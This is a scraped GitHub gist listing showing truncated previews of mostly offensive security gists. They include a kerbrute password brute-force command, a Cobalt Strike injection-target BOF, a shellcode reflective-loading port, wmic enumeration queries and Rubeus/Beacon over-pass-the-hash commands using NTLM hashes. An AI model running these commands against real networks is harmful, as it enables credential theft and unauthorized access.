With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
EspressoCake
EspressoCake
/ EnumCLR.c
Created
March 15, 2021 01:43
— forked from G0ldenGunSec/EnumCLR.c
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
EspressoCake
/ ngnix.conf
Created
February 2, 2021 22:56
— forked from WhisperingChaos/ngnix.conf
NGINX SSL/TLS Reverse Proxy to Upstream SSL servers.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| events { | |
| # nginx requires this section even when applying all default values | |
| } | |
| http { | |
| # Upstream keyword is followed by a url (domain name/IP). This reference encapsulates | |
| # the list of backend servers defined for a virtual proxy. When autnenticating | |
| # a certificate from a backend server, the upstream url is supplied to the | |
| # certificate authentication process instead of the backend server name. See | |
| # the comments associated with proxy_pass below for a detailed discussion. |
EspressoCake
/ deleteOldDuplicates.py
Last active
February 23, 2021 19:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import hashlib | |
| import itertools | |
| import os | |
| import sys | |
| __author__ = "Justin Lucas" | |
| __email__ = "jlucas@ingressive.com" |
EspressoCake
/ ShellcodeRDI.go
Last active
September 16, 2020 18:03
— forked from leoloobeek/ShellcodeRDI.go
Go implementation of https://github.com/monoxgas/sRDI/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| * | |
| * This is just a Go implementation of https://github.com/monoxgas/sRDI/ | |
| * Useful if you're trying to generate shellcode for reflective DLL | |
| * injection in Go, otherwise probably not much use :) | |
| * | |
| * The project, shellcode, most comments within this project | |
| * are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas) |
EspressoCake
/ wmic_cmds.txt
Created
September 14, 2020 18:58
— forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
EspressoCake
/ kerberos_attacks_cheatsheet.md
Created
August 14, 2020 17:59
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
EspressoCake
/ go-sharp-loader.go
Created
August 5, 2020 19:47
— forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
EspressoCake
/ gist:0d8b2d37c1360ec9a91eec595ad9711c
Created
July 27, 2020 17:00
— forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##### IF ELEVATED: | |
| # grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
| beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
| # decode the base64 blob to a binary .kirbi | |
| $ base64 -d ticket.b64 > ticket.kirbi | |
| # sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
| beacon> make_token DOMAIN\USER PassWordDoesntMatter |
EspressoCake
/ SystemCMD.cpp
Created
July 25, 2020 16:46
— forked from masthoon/SystemCMD.cpp
Launch SYSTEM CMD in user current session (from a service)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <windows.h> | |
| #include <Winbase.h> | |
| #include <Wtsapi32.h> | |
| #include <Userenv.h> | |
| #include <malloc.h> | |
| #pragma comment(lib, "Wtsapi32.lib") | |
| #pragma comment(lib, "Userenv.lib") |
EspressoCake
/ powershell.go
Created
July 14, 2020 16:15
— forked from coolbrg/powershell.go
Playing PowerShell command via Golang
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bytes" | |
| "fmt" | |
| "os/exec" | |
| "strings" | |
| ) | |
| // PowerShell struct |